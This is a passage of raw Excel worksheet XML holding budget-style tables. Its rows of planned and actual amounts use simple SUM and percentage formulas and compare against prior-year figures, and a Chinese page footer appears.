      <c r="H4" s="275"/>
    </row>
    <row r="5" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A5" s="17" t="s">
        <v>268</v>
      </c>
      <c r="B5" s="265">
        <f>SUM(B6:B21)</f>
        <v>670502</v>
      </c>
      <c r="C5" s="265">
        <f>SUM(C6:C21)</f>
        <v>644789</v>
      </c>
      <c r="D5" s="263">
        <f aca="true" t="shared" si="0" ref="D5:D31">C5/B5*100</f>
        <v>96.16511211003099</v>
      </c>
      <c r="E5" s="263">
        <f aca="true" t="shared" si="1" ref="E5:E31">C5/F5*100</f>
        <v>111.2061799128686</v>
      </c>
      <c r="F5" s="274">
        <v>579814</v>
      </c>
      <c r="G5" s="20"/>
      <c r="H5" s="275"/>
    </row>
    <row r="6" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A6" s="17" t="s">
        <v>269</v>
      </c>
      <c r="B6" s="195">
        <v>312072</v>
      </c>
      <c r="C6" s="195">
        <v>291357</v>
      </c>
      <c r="D6" s="263">
        <f t="shared" si="0"/>
        <v>93.36210874413597</v>
      </c>
      <c r="E6" s="263">
        <f t="shared" si="1"/>
        <v>109.36290646477462</v>
      </c>
      <c r="F6" s="276">
        <v>266413</v>
      </c>
      <c r="G6" s="20"/>
      <c r="H6" s="275"/>
    </row>
    <row r="7" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A7" s="17" t="s">
        <v>270</v>
      </c>
      <c r="B7" s="277">
        <v>77665</v>
      </c>
      <c r="C7" s="195">
        <v>83739</v>
      </c>
      <c r="D7" s="263">
        <f t="shared" si="0"/>
        <v>107.8207686860233</v>
      </c>
      <c r="E7" s="263">
        <f t="shared" si="1"/>
        <v>137.59735778369318</v>
      </c>
      <c r="F7" s="278">
        <v>60858</v>
      </c>
      <c r="G7" s="20"/>
      <c r="H7" s="275"/>
    </row>
    <row r="8" spans="1:8" s="159" customFormat="1" ht="20.25" customHeight="1">
      <c r="A8" s="140" t="s">
        <v>271</v>
      </c>
      <c r="B8" s="277"/>
      <c r="C8" s="200"/>
      <c r="D8" s="279"/>
      <c r="E8" s="279"/>
      <c r="F8" s="278"/>
      <c r="G8" s="141"/>
      <c r="H8" s="280"/>
    </row>
    <row r="9" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A9" s="17" t="s">
        <v>272</v>
      </c>
      <c r="B9" s="277">
        <v>17519</v>
      </c>
      <c r="C9" s="195">
        <v>14713</v>
      </c>
      <c r="D9" s="263">
        <f t="shared" si="0"/>
        <v>83.98310405845082</v>
      </c>
      <c r="E9" s="263">
        <f t="shared" si="1"/>
        <v>74.31558743307404</v>
      </c>
      <c r="F9" s="278">
        <v>19798</v>
      </c>
      <c r="G9" s="13"/>
      <c r="H9" s="275"/>
    </row>
    <row r="10" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A10" s="17" t="s">
        <v>273</v>
      </c>
      <c r="B10" s="277">
        <v>37230</v>
      </c>
      <c r="C10" s="195">
        <v>35610</v>
      </c>
      <c r="D10" s="263">
        <f t="shared" si="0"/>
        <v>95.64867042707495</v>
      </c>
      <c r="E10" s="263">
        <f t="shared" si="1"/>
        <v>108.24695260966047</v>
      </c>
      <c r="F10" s="278">
        <v>32897</v>
      </c>
      <c r="G10" s="281"/>
      <c r="H10" s="275"/>
    </row>
    <row r="11" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A11" s="17" t="s">
        <v>274</v>
      </c>
      <c r="B11" s="277">
        <v>45747</v>
      </c>
      <c r="C11" s="195">
        <v>40552</v>
      </c>
      <c r="D11" s="263">
        <f t="shared" si="0"/>
        <v>88.64406409163442</v>
      </c>
      <c r="E11" s="263">
        <f t="shared" si="1"/>
        <v>101.92017693777018</v>
      </c>
      <c r="F11" s="278">
        <v>39788</v>
      </c>
      <c r="G11" s="13"/>
      <c r="H11" s="275"/>
    </row>
    <row r="12" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A12" s="17" t="s">
        <v>275</v>
      </c>
      <c r="B12" s="277">
        <v>26539</v>
      </c>
      <c r="C12" s="195">
        <v>23487</v>
      </c>
      <c r="D12" s="263">
        <f t="shared" si="0"/>
        <v>88.49994347940766</v>
      </c>
      <c r="E12" s="263">
        <f t="shared" si="1"/>
        <v>98.3501528411708</v>
      </c>
      <c r="F12" s="278">
        <v>23881</v>
      </c>
      <c r="G12" s="269"/>
      <c r="H12" s="275"/>
    </row>
    <row r="13" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A13" s="17" t="s">
        <v>276</v>
      </c>
      <c r="B13" s="277">
        <v>21120</v>
      </c>
      <c r="C13" s="195">
        <v>19061</v>
      </c>
      <c r="D13" s="263">
        <f t="shared" si="0"/>
        <v>90.25094696969697</v>
      </c>
      <c r="E13" s="263">
        <f t="shared" si="1"/>
        <v>97.14591509097396</v>
      </c>
      <c r="F13" s="278">
        <v>19621</v>
      </c>
      <c r="G13" s="20"/>
      <c r="H13" s="275"/>
    </row>
    <row r="14" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A14" s="17" t="s">
        <v>277</v>
      </c>
      <c r="B14" s="277">
        <v>29361</v>
      </c>
      <c r="C14" s="195">
        <v>22398</v>
      </c>
      <c r="D14" s="263">
        <f t="shared" si="0"/>
        <v>76.28486768161848</v>
      </c>
      <c r="E14" s="263">
        <f t="shared" si="1"/>
        <v>79.78484664980586</v>
      </c>
      <c r="F14" s="278">
        <v>28073</v>
      </c>
      <c r="G14" s="20"/>
      <c r="H14" s="275"/>
    </row>
    <row r="15" spans="1:8" s="159" customFormat="1" ht="20.25" customHeight="1">
      <c r="A15" s="140" t="s">
        <v>278</v>
      </c>
      <c r="B15" s="277">
        <v>15665</v>
      </c>
      <c r="C15" s="200">
        <v>25140</v>
      </c>
      <c r="D15" s="279">
        <f t="shared" si="0"/>
        <v>160.48515799553144</v>
      </c>
      <c r="E15" s="279">
        <f t="shared" si="1"/>
        <v>177.404558605603</v>
      </c>
      <c r="F15" s="278">
        <v>14171</v>
      </c>
      <c r="G15" s="186"/>
      <c r="H15" s="280"/>
    </row>
    <row r="16" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A16" s="17" t="s">
        <v>279</v>
      </c>
      <c r="B16" s="277">
        <v>27696</v>
      </c>
      <c r="C16" s="195">
        <v>27596</v>
      </c>
      <c r="D16" s="263">
        <f t="shared" si="0"/>
        <v>99.63893703061814</v>
      </c>
      <c r="E16" s="263">
        <f t="shared" si="1"/>
        <v>112.85322864270233</v>
      </c>
      <c r="F16" s="278">
        <v>24453</v>
      </c>
      <c r="G16" s="20"/>
      <c r="H16" s="275"/>
    </row>
    <row r="17" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A17" s="17" t="s">
        <v>280</v>
      </c>
      <c r="B17" s="277">
        <v>15143</v>
      </c>
      <c r="C17" s="195">
        <v>9392</v>
      </c>
      <c r="D17" s="263">
        <f t="shared" si="0"/>
        <v>62.02205639569438</v>
      </c>
      <c r="E17" s="263">
        <f t="shared" si="1"/>
        <v>82.16254046015223</v>
      </c>
      <c r="F17" s="278">
        <v>11431</v>
      </c>
      <c r="G17" s="13"/>
      <c r="H17" s="275"/>
    </row>
    <row r="18" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A18" s="17" t="s">
        <v>281</v>
      </c>
      <c r="B18" s="277">
        <v>32362</v>
      </c>
      <c r="C18" s="195">
        <v>37882</v>
      </c>
      <c r="D18" s="263">
        <f t="shared" si="0"/>
        <v>117.05704220999937</v>
      </c>
      <c r="E18" s="263">
        <f t="shared" si="1"/>
        <v>146.92057089668012</v>
      </c>
      <c r="F18" s="278">
        <v>25784</v>
      </c>
      <c r="G18" s="13"/>
      <c r="H18" s="275"/>
    </row>
    <row r="19" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A19" s="17" t="s">
        <v>282</v>
      </c>
      <c r="B19" s="277">
        <v>2035</v>
      </c>
      <c r="C19" s="282">
        <v>1020</v>
      </c>
      <c r="D19" s="263">
        <f t="shared" si="0"/>
        <v>50.122850122850124</v>
      </c>
      <c r="E19" s="263">
        <f t="shared" si="1"/>
        <v>53.911205073995774</v>
      </c>
      <c r="F19" s="278">
        <v>1892</v>
      </c>
      <c r="G19" s="13"/>
      <c r="H19" s="275"/>
    </row>
    <row r="20" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A20" s="17" t="s">
        <v>283</v>
      </c>
      <c r="B20" s="277">
        <v>10293</v>
      </c>
      <c r="C20" s="282">
        <v>11900</v>
      </c>
      <c r="D20" s="263">
        <f t="shared" si="0"/>
        <v>115.6125522199553</v>
      </c>
      <c r="E20" s="263">
        <f t="shared" si="1"/>
        <v>121.7266775777414</v>
      </c>
      <c r="F20" s="278">
        <v>9776</v>
      </c>
      <c r="G20" s="13"/>
      <c r="H20" s="275"/>
    </row>
    <row r="21" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A21" s="17" t="s">
        <v>284</v>
      </c>
      <c r="B21" s="277">
        <v>55</v>
      </c>
      <c r="C21" s="282">
        <v>942</v>
      </c>
      <c r="D21" s="263">
        <f t="shared" si="0"/>
        <v>1712.727272727273</v>
      </c>
      <c r="E21" s="263">
        <f t="shared" si="1"/>
        <v>96.31901840490798</v>
      </c>
      <c r="F21" s="278">
        <v>978</v>
      </c>
      <c r="G21" s="13"/>
      <c r="H21" s="275"/>
    </row>
    <row r="22" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A22" s="17" t="s">
        <v>285</v>
      </c>
      <c r="B22" s="282">
        <f>SUM(B23:B28)</f>
        <v>192378</v>
      </c>
      <c r="C22" s="282">
        <f>SUM(C23:C28)</f>
        <v>221476</v>
      </c>
      <c r="D22" s="263">
        <f t="shared" si="0"/>
        <v>115.12543014273982</v>
      </c>
      <c r="E22" s="263">
        <f t="shared" si="1"/>
        <v>97.31187992653585</v>
      </c>
      <c r="F22" s="283">
        <v>227594</v>
      </c>
      <c r="G22" s="13"/>
      <c r="H22" s="275"/>
    </row>
    <row r="23" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A23" s="17" t="s">
        <v>286</v>
      </c>
      <c r="B23" s="277">
        <v>49230</v>
      </c>
      <c r="C23" s="195">
        <v>52777</v>
      </c>
      <c r="D23" s="263">
        <f t="shared" si="0"/>
        <v>107.20495632744263</v>
      </c>
      <c r="E23" s="263">
        <f t="shared" si="1"/>
        <v>107.70376719317578</v>
      </c>
      <c r="F23" s="278">
        <v>49002</v>
      </c>
      <c r="G23" s="13"/>
      <c r="H23" s="275"/>
    </row>
    <row r="24" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A24" s="17" t="s">
        <v>287</v>
      </c>
      <c r="B24" s="277">
        <v>66386</v>
      </c>
      <c r="C24" s="195">
        <v>86863</v>
      </c>
      <c r="D24" s="263">
        <f t="shared" si="0"/>
        <v>130.84535896122676</v>
      </c>
      <c r="E24" s="263">
        <f t="shared" si="1"/>
        <v>110.47758346581875</v>
      </c>
      <c r="F24" s="278">
        <v>78625</v>
      </c>
      <c r="G24" s="13"/>
      <c r="H24" s="275"/>
    </row>
    <row r="25" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A25" s="17" t="s">
        <v>288</v>
      </c>
      <c r="B25" s="277">
        <v>32710</v>
      </c>
      <c r="C25" s="195">
        <v>38830</v>
      </c>
      <c r="D25" s="263">
        <f t="shared" si="0"/>
        <v>118.70987465606848</v>
      </c>
      <c r="E25" s="263">
        <f t="shared" si="1"/>
        <v>111.89234360141775</v>
      </c>
      <c r="F25" s="278">
        <v>34703</v>
      </c>
      <c r="G25" s="20"/>
      <c r="H25" s="275"/>
    </row>
    <row r="26" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A26" s="17" t="s">
        <v>289</v>
      </c>
      <c r="B26" s="277">
        <v>36706</v>
      </c>
      <c r="C26" s="195">
        <v>24408</v>
      </c>
      <c r="D26" s="263">
        <f t="shared" si="0"/>
        <v>66.49594071813873</v>
      </c>
      <c r="E26" s="263">
        <f t="shared" si="1"/>
        <v>53.46768893756846</v>
      </c>
      <c r="F26" s="278">
        <v>45650</v>
      </c>
      <c r="G26" s="13"/>
      <c r="H26" s="275"/>
    </row>
    <row r="27" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A27" s="175" t="s">
        <v>290</v>
      </c>
      <c r="B27" s="277">
        <v>4190</v>
      </c>
      <c r="C27" s="195">
        <v>11332</v>
      </c>
      <c r="D27" s="263">
        <f t="shared" si="0"/>
        <v>270.45346062052505</v>
      </c>
      <c r="E27" s="263">
        <f t="shared" si="1"/>
        <v>142.0050125313283</v>
      </c>
      <c r="F27" s="278">
        <v>7980</v>
      </c>
      <c r="G27" s="257"/>
      <c r="H27" s="275"/>
    </row>
    <row r="28" spans="1:8" s="204" customFormat="1" ht="20.25" customHeight="1">
      <c r="A28" s="17" t="s">
        <v>291</v>
      </c>
      <c r="B28" s="277">
        <v>3156</v>
      </c>
      <c r="C28" s="265">
        <v>7266</v>
      </c>
      <c r="D28" s="263">
        <f t="shared" si="0"/>
        <v>230.2281368821293</v>
      </c>
      <c r="E28" s="263">
        <f t="shared" si="1"/>
        <v>62.454873646209386</v>
      </c>
      <c r="F28" s="278">
        <v>11634</v>
      </c>
      <c r="G28" s="257"/>
      <c r="H28" s="275"/>
    </row>
    <row r="29" spans="1:8" s="159" customFormat="1" ht="20.25" customHeight="1">
      <c r="A29" s="284" t="s">
        <v>292</v>
      </c>
      <c r="B29" s="277">
        <v>360014</v>
      </c>
      <c r="C29" s="277">
        <v>577372</v>
      </c>
      <c r="D29" s="279">
        <f t="shared" si="0"/>
        <v>160.3748743104435</v>
      </c>
      <c r="E29" s="279">
        <f t="shared" si="1"/>
        <v>165.75241004323436</v>
      </c>
      <c r="F29" s="278">
        <v>348334</v>
      </c>
      <c r="G29" s="186"/>
      <c r="H29" s="280"/>
    </row>
    <row r="30" spans="1:9" s="1" customFormat="1" ht="20.25" customHeight="1">
      <c r="A30" s="285" t="s">
        <v>293</v>
      </c>
      <c r="B30" s="286">
        <v>318482</v>
      </c>
      <c r="C30" s="287">
        <v>492213</v>
      </c>
      <c r="D30" s="279">
        <f t="shared" si="0"/>
        <v>154.549707675787</v>
      </c>
      <c r="E30" s="279">
        <f t="shared" si="1"/>
        <v>167.18794050413203</v>
      </c>
      <c r="F30" s="288">
        <v>294407</v>
      </c>
      <c r="G30" s="186" t="s">
        <v>294</v>
      </c>
      <c r="H30" s="280"/>
      <c r="I30" s="159"/>
    </row>
    <row r="31" spans="1:8" s="1" customFormat="1" ht="20.25" customHeight="1">
      <c r="A31" s="284" t="s">
        <v>295</v>
      </c>
      <c r="B31" s="289">
        <v>3206</v>
      </c>
      <c r="C31" s="289">
        <v>3206</v>
      </c>
      <c r="D31" s="279">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="E31" s="279">
        <f t="shared" si="1"/>
        <v>216.7680865449628</v>
      </c>
      <c r="F31" s="290">
        <v>1479</v>
      </c>
      <c r="G31" s="284"/>
      <c r="H31" s="280"/>
    </row>
    <row r="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19.5" customHeight="1"/>
    <row r="115" ht="19.5" customHeight="1"/>
    <row r="116" ht="19.5" customHeight="1"/>
    <row r="117" ht="19.5" customHeight="1"/>
    <row r="118" ht="19.5" customHeight="1"/>
    <row r="119" ht="19.5" customHeight="1"/>
    <row r="120" ht="19.5" customHeight="1"/>
    <row r="121" ht="19.5" customHeight="1"/>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:G1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.47" footer="0.47"/>
  <pageSetup firstPageNumber="1" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
  <rowBreaks count="1" manualBreakCount="1">
    <brk id="21" max="6" man="1"/>
  </rowBreaks>
</worksheet>
</file>

<file path=xl/worksheets/sheet8.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:G28"/>
  <sheetViews>
    <sheetView showGridLines="0" showZeros="0" workbookViewId="0" topLeftCell="A1">
      <pane xSplit="1" ySplit="3" topLeftCell="B4" activePane="bottomRight" state="frozen"/>
      <selection pane="bottomRight" activeCell="A6" sqref="A6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="53.875" style="203" customWidth="1"/>
    <col min="2" max="4" width="13.125" style="204" customWidth="1"/>
    <col min="5" max="5" width="11.75390625" style="204" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="10.75390625" style="205" hidden="1" customWidth="1"/>
    <col min="7" max="7" width="20.50390625" style="204" customWidth="1"/>
    <col min="8" max="16384" width="9.00390625" style="204" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="31.5" customHeight="1">
      <c r="A1" s="206" t="s">
        <v>296</v>
      </c>
      <c r="B1" s="206"/>
      <c r="C1" s="206"/>
      <c r="D1" s="206"/>
      <c r="E1" s="206"/>
      <c r="F1" s="206"/>
      <c r="G1" s="206"/>
    </row>
    <row r="2" spans="1:7" ht="18" customHeight="1">
      <c r="A2" s="207" t="s">
        <v>297</v>
      </c>
      <c r="B2" s="261"/>
      <c r="C2" s="261"/>
      <c r="D2" s="261"/>
      <c r="E2" s="261"/>
      <c r="F2" s="262"/>
      <c r="G2" s="210" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="3" spans="1:7" s="201" customFormat="1" ht="45" customHeight="1">
      <c r="A3" s="211" t="s">
        <v>298</v>
      </c>
      <c r="B3" s="212" t="s">
        <v>299</v>
      </c>
      <c r="C3" s="212" t="s">
        <v>300</v>
      </c>
      <c r="D3" s="212" t="s">
        <v>301</v>
      </c>
      <c r="E3" s="212" t="s">
        <v>302</v>
      </c>
      <c r="F3" s="213" t="s">
        <v>303</v>
      </c>
      <c r="G3" s="214" t="s">
        <v>266</v>
      </c>
    </row>
    <row r="4" spans="1:7" ht="25.5" customHeight="1">
      <c r="A4" s="215" t="s">
        <v>304</v>
      </c>
      <c r="B4" s="253">
        <f>SUM(B5:B25)</f>
        <v>3878053</v>
      </c>
      <c r="C4" s="253">
        <f>SUM(C5:C25)</f>
        <v>3741868</v>
      </c>
      <c r="D4" s="263">
        <f>C4/B4*100</f>
        <v>96.48831514164453</v>
      </c>
      <c r="E4" s="263">
        <f>C4/F4*100</f>
        <v>110.74799561846295</v>
      </c>
      <c r="F4" s="254">
        <v>3378723</v>
      </c>
      <c r="G4" s="264"/>
    </row>
    <row r="5" spans="1:7" ht="25.5" customHeight="1">
      <c r="A5" s="108" t="s">
        <v>305</v>
      </c>
      <c r="B5" s="253">
        <v>362174</v>
      </c>
      <c r="C5" s="265">
        <v>355186</v>
      </c>
      <c r="D5" s="263">
        <f aca="true" t="shared" si="0" ref="D5:D28">C5/B5*100</f>
        <v>98.07054067934197</v>
      </c>
      <c r="E5" s="263">
        <f aca="true" t="shared" si="1" ref="E5:E28">C5/F5*100</f>
        <v>112.41023758359101</v>
      </c>
      <c r="F5" s="243">
        <v>315973</v>
      </c>
      <c r="G5" s="234"/>
    </row>
    <row r="6" spans="1:7" ht="25.5" customHeight="1">
      <c r="A6" s="108" t="s">
        <v>306</v>
      </c>
      <c r="B6" s="253">
        <v>434</v>
      </c>
      <c r="C6" s="265">
        <v>434</v>
      </c>
      <c r="D6" s="263">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="E6" s="263">
        <f t="shared" si="1"/>
        <v>111.85567010309279</v>
      </c>
      <c r="F6" s="243">
        <v>388</v>
      </c>
      <c r="G6" s="234"/>
    </row>
    <row r="7" spans="1:7" ht="25.5" customHeight="1">
      <c r="A7" s="108" t="s">
        <v>307</v>
      </c>
      <c r="B7" s="253">
        <v>142470</v>
      </c>
      <c r="C7" s="265">
        <v>139731</v>
      </c>
      <c r="D7" s="263">
        <f t="shared" si="0"/>
        <v>98.07748999789429</v>
      </c>
      <c r="E7" s="263">
        <f t="shared" si="1"/>
        <v>100.567139042629</v>
      </c>
      <c r="F7" s="243">
        <v>138943</v>
      </c>
      <c r="G7" s="234"/>
    </row>
    <row r="8" spans="1:7" ht="25.5" customHeight="1">
      <c r="A8" s="108" t="s">
        <v>308</v>
      </c>
      <c r="B8" s="253">
        <v>684147</v>
      </c>
      <c r="C8" s="265">
        <v>674644</v>
      </c>
      <c r="D8" s="263">
        <f t="shared" si="0"/>
        <v>98.61097103400293</v>
      </c>
      <c r="E8" s="263">
        <f t="shared" si="1"/>
        <v>109.19591019521582</v>
      </c>
      <c r="F8" s="243">
        <v>617829</v>
      </c>
      <c r="G8" s="234"/>
    </row>
    <row r="9" spans="1:7" ht="25.5" customHeight="1">
      <c r="A9" s="108" t="s">
        <v>309</v>
      </c>
      <c r="B9" s="253">
        <v>15460</v>
      </c>
      <c r="C9" s="265">
        <v>15386</v>
      </c>
      <c r="D9" s="263">
        <f t="shared" si="0"/>
        <v>99.52134540750323</v>
      </c>
      <c r="E9" s="263">
        <f t="shared" si="1"/>
        <v>83.76980454075243</v>
      </c>
      <c r="F9" s="243">
        <v>18367</v>
      </c>
      <c r="G9" s="225"/>
    </row>
    <row r="10" spans="1:7" ht="25.5" customHeight="1">
      <c r="A10" s="108" t="s">
        <v>310</v>
      </c>
      <c r="B10" s="265">
        <v>93065</v>
      </c>
      <c r="C10" s="265">
        <v>91973</v>
      </c>
      <c r="D10" s="263">
        <f t="shared" si="0"/>
        <v>98.82662655133508</v>
      </c>
      <c r="E10" s="263">
        <f t="shared" si="1"/>
        <v>125.02616804643638</v>
      </c>
      <c r="F10" s="243">
        <v>73563</v>
      </c>
      <c r="G10" s="234"/>
    </row>
    <row r="11" spans="1:7" ht="25.5" customHeight="1">
      <c r="A11" s="108" t="s">
        <v>311</v>
      </c>
      <c r="B11" s="253">
        <v>580997</v>
      </c>
      <c r="C11" s="253">
        <v>564779</v>
      </c>
      <c r="D11" s="263">
        <f t="shared" si="0"/>
        <v>97.20859143851001</v>
      </c>
      <c r="E11" s="263">
        <f t="shared" si="1"/>
        <v>104.0039702708476</v>
      </c>
      <c r="F11" s="254">
        <v>543036</v>
      </c>
      <c r="G11" s="266"/>
    </row>
    <row r="12" spans="1:7" ht="25.5" customHeight="1">
      <c r="A12" s="108" t="s">
        <v>312</v>
      </c>
      <c r="B12" s="253">
        <v>456253</v>
      </c>
      <c r="C12" s="265">
        <v>455433</v>
      </c>
      <c r="D12" s="263">
        <f t="shared" si="0"/>
        <v>99.82027515435516</v>
      </c>
      <c r="E12" s="263">
        <f t="shared" si="1"/>
        <v>108.32165919442495</v>
      </c>
      <c r="F12" s="243">
        <v>420445</v>
      </c>
      <c r="G12" s="266"/>
    </row>
    <row r="13" spans="1:7" ht="25.5" customHeight="1">
      <c r="A13" s="157" t="s">
        <v>313</v>
      </c>
      <c r="B13" s="253">
        <v>171413</v>
      </c>
      <c r="C13" s="265">
        <v>159450</v>
      </c>
      <c r="D13" s="263">
        <f t="shared" si="0"/>
        <v>93.0209494029041</v>
      </c>
      <c r="E13" s="263">
        <f t="shared" si="1"/>
        <v>138.27822150532037</v>
      </c>
      <c r="F13" s="243">
        <v>115311</v>
      </c>
      <c r="G13" s="223"/>
    </row>
    <row r="14" spans="1:7" ht="25.5" customHeight="1">
      <c r="A14" s="108" t="s">
        <v>314</v>
      </c>
      <c r="B14" s="267">
        <v>295408</v>
      </c>
      <c r="C14" s="265">
        <v>279800</v>
      </c>
      <c r="D14" s="263">
        <f t="shared" si="0"/>
        <v>94.71645994692088</v>
      </c>
      <c r="E14" s="263">
        <f t="shared" si="1"/>
        <v>118.55078235889786</v>
      </c>
      <c r="F14" s="243">
        <v>236017</v>
      </c>
      <c r="G14" s="268"/>
    </row>
    <row r="15" spans="1:7" ht="25.5" customHeight="1">
      <c r="A15" s="108" t="s">
        <v>315</v>
      </c>
      <c r="B15" s="253">
        <v>563219</v>
      </c>
      <c r="C15" s="253">
        <v>543164</v>
      </c>
      <c r="D15" s="263">
        <f t="shared" si="0"/>
        <v>96.43921813717222</v>
      </c>
      <c r="E15" s="263">
        <f t="shared" si="1"/>
        <v>111.54295571459376</v>
      </c>
      <c r="F15" s="254">
        <v>486955</v>
      </c>
      <c r="G15" s="266"/>
    </row>
    <row r="16" spans="1:7" ht="25.5" customHeight="1">
      <c r="A16" s="108" t="s">
        <v>316</v>
      </c>
      <c r="B16" s="253">
        <v>118928</v>
      </c>
      <c r="C16" s="265">
        <v>115759</v>
      </c>
      <c r="D16" s="263">
        <f t="shared" si="0"/>
        <v>97.33536257231266</v>
      </c>
      <c r="E16" s="263">
        <f t="shared" si="1"/>
        <v>99.51172126849312</v>
      </c>
      <c r="F16" s="243">
        <v>116327</v>
      </c>
      <c r="G16" s="266"/>
    </row>
    <row r="17" spans="1:7" ht="25.5" customHeight="1">
      <c r="A17" s="156" t="s">
        <v>317</v>
      </c>
      <c r="B17" s="253">
        <v>88631</v>
      </c>
      <c r="C17" s="265">
        <v>88331</v>
      </c>
      <c r="D17" s="263">
        <f t="shared" si="0"/>
        <v>99.66151797903669</v>
      </c>
      <c r="E17" s="263">
        <f t="shared" si="1"/>
        <v>152.71611341632087</v>
      </c>
      <c r="F17" s="243">
        <v>57840</v>
      </c>
      <c r="G17" s="223"/>
    </row>
    <row r="18" spans="1:7" ht="25.5" customHeight="1">
      <c r="A18" s="156" t="s">
        <v>318</v>
      </c>
      <c r="B18" s="253">
        <v>9561</v>
      </c>
      <c r="C18" s="265">
        <v>8944</v>
      </c>
      <c r="D18" s="263">
        <f t="shared" si="0"/>
        <v>93.54670013596905</v>
      </c>
      <c r="E18" s="263">
        <f t="shared" si="1"/>
        <v>54.60650833384212</v>
      </c>
      <c r="F18" s="243">
        <v>16379</v>
      </c>
      <c r="G18" s="234"/>
    </row>
    <row r="19" spans="1:7" ht="25.5" customHeight="1">
      <c r="A19" s="156" t="s">
        <v>319</v>
      </c>
      <c r="B19" s="253">
        <v>5115</v>
      </c>
      <c r="C19" s="265">
        <v>5115</v>
      </c>
      <c r="D19" s="263">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="E19" s="263">
        <f t="shared" si="1"/>
        <v>225.92756183745584</v>
      </c>
      <c r="F19" s="243">
        <v>2264</v>
      </c>
      <c r="G19" s="232" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="20" spans="1:7" ht="25.5" customHeight="1">
      <c r="A20" s="156" t="s">
        <v>321</v>
      </c>
      <c r="B20" s="253">
        <v>46532</v>
      </c>
      <c r="C20" s="265">
        <v>46172</v>
      </c>
      <c r="D20" s="263">
        <f t="shared" si="0"/>
        <v>99.22633886357775</v>
      </c>
      <c r="E20" s="263">
        <f t="shared" si="1"/>
        <v>76.79334719334719</v>
      </c>
      <c r="F20" s="243">
        <v>60125</v>
      </c>
      <c r="G20" s="234"/>
    </row>
    <row r="21" spans="1:7" ht="25.5" customHeight="1">
      <c r="A21" s="156" t="s">
        <v>322</v>
      </c>
      <c r="B21" s="253">
        <v>110005</v>
      </c>
      <c r="C21" s="265">
        <v>98188</v>
      </c>
      <c r="D21" s="263">
        <f t="shared" si="0"/>
        <v>89.25776101086315</v>
      </c>
      <c r="E21" s="263">
        <f t="shared" si="1"/>
        <v>119.78236470990093</v>
      </c>
      <c r="F21" s="243">
        <v>81972</v>
      </c>
      <c r="G21" s="20"/>
    </row>
    <row r="22" spans="1:7" ht="25.5" customHeight="1">
      <c r="A22" s="156" t="s">
        <v>323</v>
      </c>
      <c r="B22" s="253">
        <v>12168</v>
      </c>
      <c r="C22" s="265">
        <v>11469</v>
      </c>
      <c r="D22" s="263">
        <f t="shared" si="0"/>
        <v>94.25542406311637</v>
      </c>
      <c r="E22" s="263">
        <f t="shared" si="1"/>
        <v>79.37573534500658</v>
      </c>
      <c r="F22" s="243">
        <v>14449</v>
      </c>
      <c r="G22" s="225"/>
    </row>
    <row r="23" spans="1:7" ht="25.5" customHeight="1">
      <c r="A23" s="156" t="s">
        <v>324</v>
      </c>
      <c r="B23" s="253">
        <v>23347</v>
      </c>
      <c r="C23" s="265">
        <v>21745</v>
      </c>
      <c r="D23" s="263">
        <f t="shared" si="0"/>
        <v>93.13830470724291</v>
      </c>
      <c r="E23" s="263"/>
      <c r="F23" s="243"/>
      <c r="G23" s="225"/>
    </row>
    <row r="24" spans="1:7" ht="25.5" customHeight="1">
      <c r="A24" s="156" t="s">
        <v>325</v>
      </c>
      <c r="B24" s="253">
        <f>32511+1005</f>
        <v>33516</v>
      </c>
      <c r="C24" s="253">
        <f>32511+1005</f>
        <v>33516</v>
      </c>
      <c r="D24" s="263">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="E24" s="263">
        <f t="shared" si="1"/>
        <v>176.0201670080353</v>
      </c>
      <c r="F24" s="243">
        <v>19041</v>
      </c>
      <c r="G24" s="234" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="25" spans="1:7" ht="25.5" customHeight="1">
      <c r="A25" s="108" t="s">
        <v>327</v>
